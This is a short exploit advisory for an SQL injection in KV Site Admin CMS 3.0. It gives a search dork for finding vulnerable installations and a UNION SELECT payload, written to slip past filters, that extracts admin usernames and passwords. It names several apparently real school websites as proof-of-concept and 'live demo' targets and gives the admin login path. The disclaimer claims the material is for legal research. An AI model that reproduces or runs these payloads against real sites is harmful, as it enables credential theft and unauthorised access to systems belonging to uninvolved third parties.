KV Site Admin CMS 3.0 SQL injection Vulnerability#####################
# Exploit Title : KV Site Admin CMS 3.0 SQL injection Vulnerability
# Exploit Author : xBADGIRL21
# Dork : e.World Technology Ltd. All rights reserved "Admin Area - Version 3.0"
# Version: 3.0
# MyBlog: http://xbadgirl21.blogspot.com
# Tested on: [ BackBox]
# skype:xbadgirl21
# Video Proof : https://youtu.be/43TuHcB_Kec
# Date: 26/08/2016
#####################
# [+] DESCRIPTION :
#####################
# [+] an SQL injection been Detected in KV Site Admin CMS 3.0 after you add ['] to the
# [+] Vuln Target Parameter you will get error like :
# [+] You have an error in your SQL syntax; check the manual that corresponds to your
# [+] MySQL server version for the right syntax to use near ''' at line 1
#####################
# [+] Poc :
#####################
# [page_code_no] Get Parameter Vulnerable To SQLi
#---------------------
# http://www.site.com/index-h.php?page_code_no=[SQLi]
-----------------------
# http://www.kvrihandnagar.org/index-h.php?page_code_no=19'
# http://www.kvrihandnagar.org/index-h.php?page_code_no=-19 /*!12345union*/ select 1,2,/*!12345group_coNcat(username,0x3a,password)*/,4 from 01_admin_detail--
######################
# [+] Live Demo :
######################
+ http://www.kvmughalsarai.org/index-h.php?page_code_no=40'
+ http://www.kvsrovns.org/index-h.php?page_code_no=1'
######################
# Admin Panel : http://www.site.com/kv_admin/login.php
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
#######################
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum